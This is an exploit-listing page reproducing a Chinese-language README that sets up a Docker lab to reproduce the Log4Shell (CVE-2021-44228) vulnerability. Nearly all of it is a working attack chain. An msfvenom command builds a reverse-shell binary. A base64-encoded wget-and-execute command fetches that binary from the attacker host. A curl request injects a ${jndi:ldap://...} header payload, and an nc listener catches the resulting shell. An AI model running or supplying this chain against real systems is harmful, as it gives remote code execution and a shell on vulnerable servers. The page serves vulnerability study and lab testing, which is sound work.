Exploit for Deserialization of Untrusted Data in Apache Log4J CVE-2021-44228

Name: Exploit for Deserialization of Untrusted Data in Apache Log4J CVE-2021-44228
Rating: 5 (234 reviews)
2021-12-13 | CVSS 9.3
## https://sploitus.com/exploit?id=8D604793-908D-5C35-A3EF-6D2688A10312
# Log4Shell复现环境

## 示例说明

被攻击机ip：47.47.47.47

攻击机ip：48.48.48.48

## 被攻击机运行漏洞Docker

- 使用DockerFile build docker镜像运行：

```
docker build . -t vuln
docker run -p 8080:8080 --name vuln vuln
```

## 攻击机运行攻击Docker

- 使用DockerFile build docker镜像运行

```
docker build . -t attack
docker run -itd -p 9999:9999 -p 8888:8888 -p 1389:1389 -p 9000:9000 --name attack attack
```

**攻击机环境准备**

三个不同shell中执行命令，需要保证shell活跃

- 攻击机启动JDNI服务器

```
docker exec -it attack /bin/bash
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 48.48.48.48 -p 8888
```

- 攻击机启动http服务器

```
docker exec -it attack /bin/bash
python3 -m http.server 9999
```

- 攻击机nc监听端口

```
docker exec -it attack /bin/bash
nc -lvvp 9000
```

**攻击机实现攻击**

同一shell中执行命令

```
docker exec -it attack /bin/bash
```

- 攻击机准备反弹shell文件

```
msfvenom -p linux/x64/shell_reverse_tcp LHOST=48.48.48.48 LPORT=9000 -f elf -o /rev.elf
```

- 攻击机准备payload

```
echo 'wget http://48.48.48.48:9999/rev.elf -O /tmp/rev.elf && chmod +x /tmp/rev.elf && /tmp/rev.elf' | base64
# d2dldCBodHRwOi8vNDguNDguNDguNDg6OTk5OS9yZXYuZWxmIC1PIC90bXAvcmV2LmVsZiAmJiBjaG1vZCAreCAvdG1wL3Jldi5lbGYgJiYgL3RtcC9yZXYuZWxmCg==
```

- 发送攻击payload

```
curl 47.47.47.47:8080 -H 'X-Api-Version: ${jndi:ldap://48.48.48.48:1389/Basic/Command/Base64/d2dldCBodHRwOi8vNDguNDguNDguNDg6OTk5OS9yZXYuZWxmIC1PIC90bXAvcmV2LmVsZiAmJiBjaG1vZCAreCAvdG1wL3Jldi5lbGYgJiYgL3RtcC9yZXYuZWxmCg==}'
```

## 命令生成

```
python3 command_gen.py vuln_ip attack_ip
```

## 视频演示

[Video](https://github.com/ycdxsb/Log4Shell-CVE-2021-44228-ENV/tree/main/ScreenFlow.mp4)

## 参考

- https://github.com/christophetd/log4shell-vulnerable-app
- https://github.com/twseptian/Spring-Boot-Log4j-CVE-2021-44228-Docker-Lab